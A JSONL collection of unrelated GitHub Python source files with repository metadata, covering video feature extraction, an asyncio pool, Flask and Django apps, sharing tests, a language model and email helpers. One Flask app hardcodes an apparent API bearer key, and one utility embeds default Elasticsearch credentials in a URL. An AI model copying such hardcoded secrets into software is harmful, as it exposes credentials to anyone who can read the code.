valid:\n for clip_id, clip in enumerate(clips):\n feats = run_batch(clip, model) # (16, 2048)\n feats = feats.squeeze()\n clip_feat.append(feats)\n else:\n clip_feat = np.zeros(shape=(num_clips, 16, 2048))\n clip_feat = np.asarray(clip_feat) # (8, 16, 2048)\n if feat_dset is None:\n C, F, D = clip_feat.shape\n feat_dset = fd.create_dataset('resnet_features', (dataset_size, C, F, D),\n dtype=np.float32)\n file_ids_dset = fd.create_dataset('ids', shape=(dataset_size,), dtype=np.int)\n elif args.feature_type in ['motion', 'hand']:\n clip_torch = torch.FloatTensor(np.asarray(clips)).cuda()\n if valid:\n clip_feat = model(clip_torch) # (8, 2048)\n clip_feat = clip_feat.squeeze()\n clip_feat = clip_feat.detach().cpu().numpy()\n else:\n clip_feat = np.zeros(shape=(num_clips, 2048))\n if feat_dset is None:\n C, D = clip_feat.shape\n feat_dset = fd.create_dataset('resnext_features', (dataset_size, C, D),\n dtype=np.float32)\n file_ids_dset = fd.create_dataset('ids', shape=(dataset_size,), dtype=np.int)\n\n i1 = i0 + 1\n feat_dset[i0:i1] = clip_feat\n file_ids_dset[i0:i1] = int(file_id[2:])\n i0 = i1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu_id', type=int, default=0, help='specify which gpu will be used')\n # dataset info\n parser.add_argument('--dataset', default='CFO', choices=['CFO'], type=str)\n # output\n parser.add_argument('--out', dest='outfile',\n help='output filepath',\n default=\"data/{}/{}_{}_feat.hdf5\", type=str)\n # image sizes\n parser.add_argument('--num_clips', default=8, type=int)\n parser.add_argument('--image_height', default=224, type=int)\n parser.add_argument('--image_width', default=224, type=int)\n\n # network params\n parser.add_argument('--feature_type', default='appearance', choices=['appearance', 'motion', 'hand', 'audio'], type=str)\n parser.add_argument('--seed', default='666', type=int, help='random seed')\n args = parser.parse_args()\n if args.feature_type == 'appearance':\n args.model = 'resnet101'\n elif args.feature_type in ['motion', 'hand']:\n args.model = 'resnext101'\n elif args.feature_type == 'audio':\n args.model = 'VGGish'\n else:\n raise Exception('Feature type not supported!')\n # set gpu\n if args.model != 'resnext101':\n torch.cuda.set_device(args.gpu_id) # use GPU\n torch.manual_seed(args.seed) # set the random seed\n np.random.seed(args.seed)\n\n # annotation files\n if args.dataset == 'CFO':\n args.annotation_file = './data/dataset/CFO/info.json'\n args.dataset_dir = './data/dataset/CFO/'\n video_paths = load_file_paths(args)\n random.shuffle(video_paths)\n # load model\n if args.feature_type == 'appearance':\n model = build_resnet()\n elif args.feature_type in ['motion', 'hand']:\n model = build_resnext()\n elif args.feature_type == 'audio':\n model = torch.hub.load('harritaylor/torchvggish', 'vggish')\n extract_feature(model, video_paths, args.num_clips,\n args.outfile.format(args.dataset, args.dataset, args.feature_type))\n\n","repo_name":"achyun/MRAN","sub_path":"preprocess/extract_feat.py","file_name":"extract_feat.py","file_ext":"py","file_size_in_byte":11253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15462127380","text":"\"\"\"\n此处沿用\n https://github.com/mosquito/aio-pika/blob/master/aio_pika/pool.py 中的代码\n 本项目中 采用 aiormq 作为底层库 而非 aio_pika\n仅仅去掉 log句柄\n\"\"\"\nimport asyncio\nfrom typing import Callable, TypeVar, Any\nfrom typing import AsyncContextManager, Coroutine\n\n\nT = TypeVar(\"T\")\nItemType = Coroutine[Any, None, T]\nConstructorType = Callable[..., ItemType]\n\n\nclass Pool(object):\n __slots__ = (\n 'loop', '__max_size', '__items',\n '__constructor', '__created', '__lock',\n '__constructor_args'\n )\n\n def __init__(self, constructor: ConstructorType, *args, max_size: int =\n None, loop: asyncio.AbstractEventLoop = None):\n self.loop = loop or asyncio.get_event_loop()\n self.__max_size = max_size\n self.__items = asyncio.Queue(loop=self.loop)\n self.__constructor = constructor\n self.__constructor_args = args or ()\n self.__created = 0\n self.__lock = asyncio.Lock(loop=self.loop)\n\n def acquire(self) -> 'PoolItemContextManager':\n return PoolItemContextManager(self)\n\n @property\n def _has_released(self):\n return self.__items.qsize() > 0\n\n @property\n def _is_overflow(self) -> bool:\n if self.__max_size:\n return self.__created >= self.__max_size or self._has_released\n return self._has_released\n\n async def _create_item(self) -> T:\n async with self.__lock:\n if self._is_overflow:\n return await self.__items.get()\n\n # print('Creating a new instance of %r', self.__constructor)\n item = await self.__constructor(*self.__constructor_args)\n self.__created += 1\n return item\n\n async def _get(self) -> T:\n if self._is_overflow:\n channel = await self.__items.get()\n if channel.is_closed:\n # print('channel is close')\n self.__created -= 1\n channel = await self._create_item()\n # print('new a channel ', channel.is_closed)\n return channel\n\n return await self._create_item()\n\n def put(self, item: T):\n return self.__items.put_nowait(item)\n\n\nclass PoolItemContextManager(AsyncContextManager):\n __slots__ = 'pool', 'item'\n\n def __init__(self, pool: Pool):\n self.pool = pool\n self.item = None\n\n async def __aenter__(self) -> T:\n self.item = await self.pool._get()\n return self.item\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n if self.item is not None:\n self.pool.put(self.item)\n","repo_name":"littlebai3618/bspider","sub_path":"bspider/utils/rabbitMQ/async_client/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4361565214","text":"def max_num(\n a,\n b,\n c,\n):\n if a > b and a > c:\n return a\n if c > b and c > a:\n return c\n if b > a and b > c:\n return b\n\n\nprint (max_num(1, 33, 8))\n","repo_name":"NKATEKO01/Level-0-coding-challenges","sub_path":"question6.py","file_name":"question6.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"126816489","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom urlparse import urlparse\n\nimport mpfs.engine.process\n\nfrom test.common.sharing import CommonSharingMethods\nfrom test.base_suit import set_up_open_url, tear_down_open_url\nfrom mpfs.common.util import from_json\nfrom mpfs.config import settings\nfrom mpfs.core.filesystem.dao.legacy import CollectionRoutedDatabase\n\n\ndb = CollectionRoutedDatabase()\n\n\nclass MediaSharingTestCase(CommonSharingMethods):\n\n def setup_method(self, method):\n super(MediaSharingTestCase, self).setup_method(method)\n self.json_ok('user_init', {'uid': self.uid_1})\n self.json_ok('user_init', {'uid': self.uid_3})\n self.make_dirs()\n\n def test_invite_to_photostream(self):\n self.mail_ok('mksysdir', {'uid' : self.uid, 'type':'photostream'})\n result = self.mail_ok('share_create_group', {'uid': self.uid, 'path': u'/disk/Фотокамера/'})\n for each in result.getchildren():\n if each.tag == 'gid' and each.text and isinstance(each.text, str):\n gid = each.text\n self.assertTrue(gid)\n\n hsh = self.invite_user(path=u'/disk/Фотокамера/', uid=self.uid_3, email=self.email_3)\n args = {'hash': hsh, 'uid' : self.uid_3,}\n folder_info = self.mail_ok('share_activate_invite', args)\n name = folder_info.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера (mpfs-test)')\n\n def test_resolve_photostream_conflicts(self):\n # Создаем обычную папку Фотокамера\n self.json_ok('mkdir', {'uid': self.uid, 'path': u'/disk/Фотокамера/'})\n\n # Создаем группу Фотокамера\n result = self.mail_ok('share_create_group', {'uid' : self.uid, 'path': u'/disk/Фотокамера/'})\n for each in result.getchildren():\n if each.tag == 'gid' and each.text and isinstance(each.text, str):\n gid = each.text\n self.assertTrue(gid)\n\n # Приглашаем, проверяем, что принятая папка называется Фотокамера\n hsh = self.invite_user(uid=self.uid_3, path=u'/disk/Фотокамера/', rights='640')\n args = {'hash': hsh, 'uid': self.uid_3}\n folder_info = self.mail_ok('share_activate_invite', args)\n name = folder_info.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера')\n\n # Создаем особую папку Фотокамеры у приглашенного\n self.mail_ok('mksysdir', {'uid': self.uid_3, 'type': 'photostream'})\n\n # Проверяем\n result = self.mail_ok('info', {'uid': self.uid_3, 'path': u'/disk/Фотокамера/'})\n name = result.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера')\n\n result = self.mail_ok('info', {'uid': self.uid_3, 'path': u'/disk/Фотокамера 1/'})\n name = result.find('folder').find('name')\n self.assertEqual(name.text, u'Фотокамера 1')\n\n owner = result.find('folder').find('meta').find('group').find('owner').find('login')\n self.assertEqual(owner.text, u'mpfs-test')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/test/parallelly/sharing/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29145121635","text":"from flask import Flask\nfrom flask import render_template\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__)\n# We need to define our Model, which is the Python version of our SQL table.\n# Every table gets a model, and we use that model to play around with its associated table from Python.\n\n# First off, you tell the app where to find the database and initialize SQLAlchemy:\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///schools.sqlite3'\ndb = SQLAlchemy(app)\n# Let SQLALchemy infer the data type of each column by looking at the existing columns, this is called reflecting\ndb.Model.metadata.reflect(db.engine)\n\n'''\nTo create the model, we need to tell the model four things\n1. It's name, here \"School\", because it's a list of schools\n2. The table name to both find the data and to learn the columns from. That’s schools-geocoded, because TablePlus took the name right from the CSV file and did not give us any other choice.\n3. A weird line about \"extend_existing\" which is always exactly the same\n4. Even though SQLALchemy learns the columns by reflecting, it needs a unique column to be able to keep each row separate, like an id. In this case, it’s the LOC_CODE column. This is called the “primary key.”\n'''\nclass School(db.Model):\n __tablename__ = 'schools-geocoded'\n __table_args__ = {'extend_existing': True}\n LOC_CODE = db.Column(db.Text, primary_key=True)\n\n@app.route(\"/\")\ndef index():\n\n # School.query.count() uses our model - School - to visit the database, build a new query, and count the number of rows in the table.\n print(\"Total number of schools is\", School.query.count())\n # school_count = f\"{School.query.count():,}\"\n school_count = School.query.count()\n\n # Make a query to our School model to filter for a specific data point\n # What comes back from the database is that one row where LOC_CODE='X270' - we only got one because we asked for .first().\n # You can just ask for each column with a period.\n school = School.query.filter_by(LOC_CODE='X270').first()\n print(\"School's name is\", school.SCHOOLNAME)\n\n # If we want to get fancier, we can also select multiple rows with .all()\n # Since we asked for .all() what comes back is similar to a list.\n # Remember that SQLALchemy is not like pandas, and you only get to use one item at a time!\n schools = School.query.all()\n\n # When you use print in the Flask app, it does not print to the web page. That’s the render_template part.\n # Instead, print prints to the command line. It’s totally useless for showing things to the user, but a nice cheat to check things and help us debug.\n return render_template(\"list.html\", count=school_count, schools=schools, location=\"New York City\")\n\n@app.route('/city')\ndef city_list():\n # Get the unique city values from the database\n cities = School.query.with_entities(School.city).distinct().all()\n # They're in a weird list of one-element lists, though, like\n # [['Yonkers'],['Brooklyn'],['Manhattan']]\n # so we'll take them out of that\n cities = [city[0].title() for city in cities]\n # Now that they're both \"New York,\" we can now dedupe and sort\n cities = sorted(list(set(cities)))\n return render_template(\"cities.html\", cities=cities)\n\n@app.route('/schools/<slug>')\ndef detail(slug):\n school = School.query.filter_by(LOC_CODE=slug).first()\n return render_template(\"detail.html\", school=school)\n\n@app.route('/city/<cityname>')\ndef city(cityname):\n cityname = cityname.replace(\"-\", \" \")\n schools = School.query.filter_by(city=cityname.upper()).all()\n return render_template(\"list.html\", schools=schools, count=len(schools), location=cityname)\n\n@app.route('/zip/<zipcode>')\ndef zip(zipcode):\n schools = School.query.filter_by(ZIP=zipcode).all()\n return render_template(\"list.html\", schools=schools, count=len(schools), location=zipcode)\n\nif __name__ == \"__main__\":\n\n app.run(debug=True)","repo_name":"kdmayer/flask_tutorial","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21942444892","text":"from pathlib import Path\nfrom struct import unpack, calcsize\nimport click\nfrom tqdm import tqdm\nimport math\nimport numpy as np\n\n\nclass Trace:\n def __init__(self, filename):\n # [version] [requests] [requests] [unique] [data]\n # 1 x x z index\n # 2 file size count unique (i, s)\n self.filename = filename\n with filename.open('rb') as f:\n self.version, self.size, self.requests, self.unique = unpack('qqqq', f.read(8 * 4))\n if self.version not in (1, 2):\n raise RuntimeError(f\"Unknown trace version {version}\")\n\n def __iter__(self):\n with self.filename.open('rb') as f:\n f.read(8 * 4)\n if self.version == 1:\n for _ in range(self.size):\n yield unpack('q', f.read(8))[0]\n elif self.version == 2:\n for _ in range(self.size):\n start, count = unpack('qq', f.read(8 * 2))\n yield from range(start, start + count)\n\n\n@click.group()\ndef commands():\n pass\n\n\n@commands.command(name='list', help='List all traces in a folder and their size')\n@click.argument('path')\ndef list_all(path):\n p = Path(path)\n\n for filename in p.glob('*.blis'):\n trace = Trace(filename)\n print(f'{str(trace.filename.name):<19} version = {trace.version} '\n f'size = {trace.size:>8} '\n f'requests/unique = {trace.requests:>8}/{trace.unique:>8} '\n f'[{trace.requests / trace.unique:.3f}]')\n\n\n@commands.command(help='Get info about single trace')\n@click.option('--latex/--no-latex', default=False)\n@click.argument('filename')\ndef stat(filename, latex):\n trace = Trace(Path(filename))\n n = trace.requests - trace.unique\n\n last_seen = {}\n distances = []\n for i, req in tqdm(enumerate(iter(trace)), desc=\"Loading data\",\n total=trace.requests, leave=False, miniters=100000):\n d = i - last_seen.get(req, i)\n if d != 0:\n distances.append(d)\n last_seen[req] = i\n\n distances = np.array(distances)\n mean = np.mean(distances)\n stddev = distances.std()\n median = int(np.median(distances))\n\n if latex:\n print(f'{trace.filename.name:<7} & {trace.requests:>8} & {trace.unique:>8} & '\n f'{trace.requests/trace.unique:>5.2f} & {median:>7} & '\n f'{mean:>7.0f} & {stddev:>7.0f} & {stddev/mean:>4.2f} \\\\\\\\')\n else:\n print(f'{trace.filename.name}')\n print(f'Requests/Targets: {trace.requests}/{trace.unique} '\n f'[{trace.requests / trace.unique:.2f} R/T]')\n print(f'Median distance: {median}')\n print(f'Mean distance: {mean:.0f} ± {stddev:.0f} [RSD {stddev / mean:.2f}]')\n\n\nif __name__ == '__main__':\n commands()\n","repo_name":"metopa/lru_benchmark","sub_path":"traces/trace_info.py","file_name":"trace_info.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"4014805301","text":"Import(\"src_env\")\nrewofs_env = src_env.Clone()\n\nMAIN = \"main.cpp\"\nSRC = Glob(\"*.cpp\", exclude=MAIN) + Glob(\"client/*.cpp\") + Glob(\"server/*.cpp\")\n\nrewofs_env.Flatc(\n Glob(\"messages/*.fbs\"),\n FLATC_OUTDIR=Dir(\"messages\").abspath,\n FLATC_FLAGS=[\n \"--cpp\",\n \"--scoped-enums\",\n \"--gen-mutable\",\n \"--gen-object-api\",\n \"--gen-name-strings\",\n \"--reflect-types\",\n \"--reflect-names\",\n ],\n FLATC_INCPATH=[\"#src\"],\n )\n\nOUT = \"rewofs\"\n\nrewofs_lib = [\n src_env.WholeArchive(rewofs_env.StaticLibrary(OUT, SRC)),\n \"fuse3\", \"nanomsg\", \"anl\", \"fmt\", \"zstd\",\n \"boost_program_options\", \"boost_filesystem\", \"boost_system\",\n \"inotifytools\",\n ]\n\nrewofs_env.AppendUnique(LIBS=[rewofs_lib])\n\nrewofs_prog = rewofs_env.Program(OUT, [MAIN])[0]\n\nExport(\"rewofs_lib\", \"rewofs_prog\")\n","repo_name":"dsiroky/rewofs","sub_path":"src/rewofs/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10543408400","text":"from __future__ import print_function\nimport codecs\nimport pickle\nimport os\nimport sys\nimport marisa_trie\n\nfrom nksnd.utils import words\nfrom nksnd.dictionaries import marisa_dict\nfrom nksnd.graph import graph, viterbi\nfrom nksnd.slm import slm\nfrom nksnd.config import lmconfig, slm_config\n\ndef concat(files):\n for file in files:\n for line in file:\n yield line.strip('\\n')\n\ndef count_words_and_lines(sentences):\n counts = {}\n lines_num = 0\n for sentence in sentences:\n lines_num += 1\n for word in sentence:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n return counts, lines_num\n\ndef cut_off_set(counts, cut_off):\n return marisa_trie.Trie((x for x in counts.keys() if counts[x] > cut_off))\n\ndef pronounciation(sentence):\n pronoun = u\"\"\n for word in sentence:\n s, p = words.surface_pronoun(word)\n pronoun = pronoun + p\n return pronoun\n\nclass LM:\n\n def __init__(self):\n pass\n\n def train(self, file_names):\n print(\"Counting words...\")\n files = [codecs.open(fname, encoding='utf-8') for fname in file_names]\n lines = concat(files)\n sentences = (line.split(' ') for line in lines)\n counts, lines_num = count_words_and_lines(sentences)\n self.known_words = cut_off_set(counts, lmconfig.unknownword_threshold)\n map(lambda f: f.close(), files)\n\n print(\"Building statistical model...\")\n files = [codecs.open(fname, encoding='utf-8') for fname in file_names]\n lines = concat(files)\n sentences = (line.split(' ') for line in lines)\n self.slm = slm.SLM()\n self.slm.fit(sentences)\n map(lambda f: f.close(), files)\n\n print(\"training end.\")\n\n def score(self, words):\n words = [u'_BOS'] + words + [u'_EOS']\n score = 0\n for i in range(len(words) - 1):\n score += self.slm.get_bigram_weight(words[i], words[i+1])\n return score\n\n def n_candidates(self, pronoun, n):\n gr = graph.Graph(self.slm, pronoun)\n viterbi.forward_dp(self.slm, gr)\n paths = viterbi.backward_a_star(self.slm, gr, n)\n return paths\n\n def convert(self, pronoun):\n return self.n_candidates(pronoun, 1)[0]\n\n def next_candidates(self, words, pronoun, num):\n candidates = self.slm.get_from_pronoun(pronoun)\n if len(words) > 0:\n candidates_with_weight = [(word, self.slm.get_bigram_weight(words[-1], word)) for word in candidates]\n else:\n candidates_with_weight = [(word, self.slm.get_unigram_weight(word)) for word in candidates]\n sorted_tuples = sorted(candidates_with_weight, key=lambda t: - t[1])\n sorted_candidates = list(map(lambda t: t[0], sorted_tuples))\n if num > 0:\n return sorted_candidates[:num]\n else:\n return sorted_candidates\n\n def save(self, path):\n\n print(\"Saving the language model...\", file=sys.stderr)\n marisa_known_words = marisa_trie.Trie(self.known_words)\n marisa_known_words.save(os.path.join(path, 'known_words'))\n self.slm.save(path)\n print(\"end.\", file=sys.stderr)\n\n def load(self, path):\n self.slm = slm.SLM()\n self.slm.mmap(path)\n self.known_words = marisa_trie.Trie().mmap(os.path.join(path, 'known_words'))\n","repo_name":"yoriyuki/nksnd","sub_path":"nksnd/lm/lm.py","file_name":"lm.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"} +{"seq_id":"19834773487","text":"import mosek\nimport sys\nimport time\n\ndef streamprinter(msg):\n sys.stdout.write(msg)\n sys.stdout.flush()\n\nif len(sys.argv) != 5:\n print(\"Missing argument, syntax is:\")\n print(\" opt-server-async inputfile host port numpolls\")\nelse:\n\n filename = sys.argv[1]\n host = sys.argv[2]\n port = sys.argv[3]\n numpolls = int(sys.argv[4])\n token = None\n\n with mosek.Env() as env:\n\n with env.Task(0, 0) as task:\n\n print(\"reading task from file\")\n task.readdata(filename)\n\n print(\"Solve the problem remotely (async)\")\n token = task.asyncoptimize(host, port)\n\n print(\"Task token: %s\" % token)\n\n with env.Task(0, 0) as task:\n\n task.readdata(filename)\n\n task.set_Stream(mosek.streamtype.log, streamprinter)\n\n i = 0\n\n while i < numpolls:\n\n time.sleep(0.1)\n\n print(\"poll %d...\" % i)\n respavailable, res, trm = task.asyncpoll(host,\n port,\n token)\n\n print(\"done!\")\n\n if respavailable:\n print(\"solution available!\")\n\n respavailable, res, trm = task.asyncgetresult(host,\n port,\n token)\n\n task.solutionsummary(mosek.streamtype.log)\n break\n\n i = i + 1\n\n if i == numpolls:\n print(\"max number of polls reached, stopping host.\")\n task.asyncstop(host, port, token)","repo_name":"OxDuke/Bilevel-Planner","sub_path":"third_party/mosek/9.0/tools/examples/python/opt_server_async.py","file_name":"opt_server_async.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"16243370541","text":"from django.shortcuts import render\nfrom .models import Destination\n# Create your views here.\n\ndef index(request):\n dest1 = Destination()\n dest1.place = \"India\"\n dest1.city = \"chennai - Marina beach\"\n dest1.price = 999\n dest1.offer = True\n\n\n dest2 = Destination()\n dest2.place = \"America\"\n dest2.city = \"New york\"\n dest2.price = 1999\n dest2.offer = False\n\n dest3 = Destination()\n dest3.place = \"Japan\"\n dest3.city = \"Tokyo\"\n dest3.price = 1500\n dest3.offer = True\n\n dests = [dest1,dest2,dest3]\n\n\n\n return render(request,'index.html',{'dests':dests})\n\n","repo_name":"viswasarathi/Django_learn","sub_path":"travello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33070307858","text":"from flask import Flask, render_template, request\r\nimport requests\r\n\r\napp = Flask(__name__,template_folder=\"C:/Users/gujar/Downloads/WorqTroika-main/WorqTroika-main/templates\")\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/generate_notes', methods=['POST'])\r\ndef generate_notes():\r\n question = request.form.get('question')\r\n\r\n # Make a request to the Worqhat API\r\n url = \"https://api.worqhat.com/api/ai/content/v2\"\r\n headers = {\r\n \"Authorization\": \"Bearer sk-cb66f6d3f4b34978a7714eb9a6651f21\",\r\n \"Content-Type\": \"application/json\"\r\n }\r\n data = {\r\n \"question\": question,\r\n \"randomness\": 0.4\r\n }\r\n response = requests.post(url, headers=headers, json=data)\r\n\r\n if response.status_code == 200:\r\n try:\r\n notes = response.json()['content']\r\n return render_template('notes.html', notes=notes)\r\n except KeyError:\r\n return \"Error: Response format is unexpected\"\r\n else:\r\n return \"Error: Unable to generate notes\"\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True,port=5001)\r\n","repo_name":"Sohamgujar71/TechTroika_WorqHat","sub_path":"textgen.py","file_name":"textgen.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13419774467","text":"import smtplib\n\nimport shareds\nimport logging\nimport traceback\n\nfrom flask_mail import Mail, Message\nfrom models import syslog\n#from builtins import False\n\ndef get_sysname():\n sysname = shareds.app.config.get(\"STK_SYSNAME\")\n return sysname\n\ndef email(mail_from,mail_to,reply_to,subject,body):\n try:\n mail = Mail()\n sysname = get_sysname()\n msg = Message(f\"{sysname.title()}: {subject}\",\n body=body,\n sender=mail_from,\n reply_to=reply_to,\n recipients=[mail_to])\n mail.send(msg)\n return True\n except Exception as e:\n logging.error(\"iError in sending email\")\n logging.error(str(e))\n traceback.print_exc()\n return False\n\ndef email_admin(subject,body,sender=None): # send email to admin\n # must use isotammi.net domain for the sender (Sender Policy Framework)\n admin = shareds.app.config.get('ADMIN_EMAIL_FROM')\n \n mail_to = shareds.app.config.get('ADMIN_EMAIL_TO')\n \n # put the original sender in the 'reply to' address\n if sender is None:\n reply_to = mail_to\n else:\n reply_to = sender\n if admin and mail_to and reply_to:\n if email(admin,mail_to,reply_to,subject,body):\n syslog.log(type=\"sent email to admin\", sender=sender,receiver=mail_to,reply_to=reply_to,subject=subject)\n return True\n else: \n syslog.log(type=\"FAILED: email to admin\", sender=sender,receiver=mail_to,reply_to=reply_to,subject=subject)\n return False\n return False\n \ndef email_from_admin(subject,body,receiver):\n sender = shareds.app.config.get('ADMIN_EMAIL_FROM')\n reply_to = shareds.app.config.get('ADMIN_EMAIL_TO')\n if sender and reply_to:\n syslog.log(type=\"sent email from admin\",sender=sender,receiver=receiver,reply_to=reply_to,subject=subject) \n return email(sender,receiver,reply_to,subject,body) \n","repo_name":"Taapeli/stk-upload","sub_path":"app/models/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"73467056872","text":"import logging\nfrom elasticsearch_dsl import Search\nfrom elasticsearch_dsl.connections import connections\n\nfrom lawgokr.settings import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT\nfrom lawgokr.exceptions import ElasticSearchError\n\nclass Counter:\n def __init__(self, total_cases, saved_cases):\n self.total_cases = total_cases\n self.saved_cases = saved_cases\n\n\ndef logger(message):\n logging.warning(message)\n with open('../output.log', 'a') as file:\n file.write(message + '\\n')\n\n\n# es = Elasticsearch(\n# [\n# 'http://user:secret@localhost:9200/',\n# 'https://user:secret@other_host:443/production'\n# ],\n# verify_certs=True\n# )\n\n\ndef create_connection():\n try:\n # connections.create_connection(hosts=[f'{ELASTICSEARCH_HOST}:{ELASTICSEARCH_PORT}'])\n connections.create_connection(hosts=[ 'http://elastic:changeme@localhost:9200/' ])\n except Exception as e:\n logger(str(e))\n raise ElasticSearchError('Elasticsearch Connection Error')\n\n\ndef is_unique(model):\n response = Search(index=\"law_go_kr\") \\\n .query(\"match\", case_id=model.case_id).execute()\n return False if response else True\n\n\ndef db_cases_count():\n s = Search(index='law_go_kr')\n s.from_dict({\"query\": {\"wildcard\": {\"case_id\": \"*\"}}})\n return s.count()\n","repo_name":"ganadara135/law2","sub_path":"lawgokr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12600903502","text":"def main():\n uniquedict = dict();\n in_file = open(\"tale_of_two_cities.txt\",\"r\")\n allwords=open(\"allwords.txt\",\"w\")\n \n unique=open(\"a3_novelvisualization/uniquewords.txt\",\"w\")\n \n freq=open(\"a3_wordfrequency/wordfrequency.txt\",\"w\")\n for line in in_file:\n wordlist=line.split()\n for word in wordlist:\n word=word.lower()\n writeword=''\n for character in word:\n if character.isalpha():\n writeword+=character\n allwords.write(writeword+'\\n')\n if writeword in uniquedict:\n uniquedict[writeword]+=1\n else:\n uniquedict[writeword]=1\n unique.write(writeword+'\\n')\n \n \n \n valuelist=list(set(uniquedict.values()))\n valuelist.sort()\n\n\n for i in valuelist:\n count=0\n for key in uniquedict:\n if uniquedict[key]>=i:\n count+=1\n freq.write(str(i)+\": \"+ str(count)+'\\n')\n allwords.close()\n unique.close()\n freq.close()\nmain()\n","repo_name":"smitches/Group-1","sub_path":"group_1_assignment3/extract_words.py","file_name":"extract_words.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}